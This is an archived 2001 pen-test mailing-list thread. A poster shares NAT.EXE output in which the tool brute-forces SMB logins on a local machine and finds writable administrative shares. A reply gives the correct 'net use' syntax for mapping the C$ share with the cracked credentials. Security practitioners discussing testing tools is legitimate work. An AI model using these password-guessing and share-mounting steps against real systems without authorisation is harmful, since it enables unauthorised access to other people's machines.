RE: Using Null Session information from NAT.EXE
From: Herman Sheremetyev (Herman.Sheremetyev@hostcentric.com)Date: 10/30/01
- Previous message: Ryan Permeh: "Re: xprobe 0.2"
- Maybe in reply to: Ian Lyte: "Using Null Session information from NAT.EXE"
- Next in thread: Oliver Karow: "Re: Using Null Session information from NAT.EXE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Subject: RE: Using Null Session information from NAT.EXE Date: Tue, 30 Oct 2001 15:05:44 -0500 Message-ID: <BE46985C58C4BE4A8CF9AA1C5C404C37284993@exvrtsrv.hostcentric.com> From: "Herman Sheremetyev" <Herman.Sheremetyev@hostcentric.com> To: "Ian Lyte" <ianlyte@hotmail.com>, <pen-test@securityfocus.com>
net use * \\IP_ADDR\C$ password /user:COMPUTER_NAME\username should do
the trick.
-Herman
-----Original Message-----
From: Ian Lyte [mailto:ianlyte@hotmail.com]
Sent: Tuesday, October 30, 2001 12:40 PM
To: pen-test@securityfocus.com
Subject: Using Null Session information from NAT.EXE
Running NAT.EXE on a machine my local network gives me the following
results
[obvious bits changed]
[*]--- Reading usernames from user.txt
[*]--- Reading passwords from bigpass.txt
[*]--- Checking host: xxx.xxx.xxx.xxx
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Tue Oct 30 14:30:36 2001
[*]--- Timezone is UTC+0.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`0'
<---SNIP--->
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[xxxxxxx] User=[] Workgroup=[xxxxxxx] Domain=[]
[*]--- Attempting to access share: \\*SMBSERVER\ <file://\\*SMBSERVER\>
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
<file://\\*SMBSERVER\ADMIN$>
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
<file://\\*SMBSERVER\ADMIN$>
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
<file://\\*SMBSERVER\ADMIN$>
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
<file://\\*SMBSERVER\ADMIN$>
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
<file://\\*SMBSERVER\ADMIN$>
[*]--- Attempting to access share: \\*SMBSERVER\C$
<file://\\*SMBSERVER\C$>
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
<file://\\*SMBSERVER\C$>
[*]--- Checking write access in: \\*SMBSERVER\C$
<file://\\*SMBSERVER\C$>
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
<file://\\*SMBSERVER\C$>
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
<file://\\*SMBSERVER\C$>
[*]--- Attempting to access share: \\*SMBSERVER\D$
<file://\\*SMBSERVER\D$>
[*]--- WARNING: Able to access share: \\*SMBSERVER\D$
<file://\\*SMBSERVER\D$>
[*]--- Checking write access in: \\*SMBSERVER\D$
<file://\\*SMBSERVER\D$>
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$
<file://\\*SMBSERVER\D$>
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$
<file://\\*SMBSERVER\D$>
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
<file://\\*SMBSERVER\ROOT>
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
<file://\\*SMBSERVER\WINNT$>
[*]--- Unable to access
Now from here I thought it would just be a case of
NET USE Z: xxx.xxx.xxx.xxx\c$ /user:administrator password
to map the C$ to a local z:
However every time I try that it gives me a
System error 1326 has occurred.
Logon Failure: unknown user name or bad password.
Now I have gone to the machine and know that the user:pass combo is
correct.
So, what am I doing wrong? I've searched the archives to no avail and I
notice on Google groups that a lot of people have asked the same
question
but not received an answer. So I am turning to you guys ;)
Ian
_________________________________________________________________
Get your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
- Previous message: Ryan Permeh: "Re: xprobe 0.2"
- Maybe in reply to: Ian Lyte: "Using Null Session information from NAT.EXE"
- Next in thread: Oliver Karow: "Re: Using Null Session information from NAT.EXE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
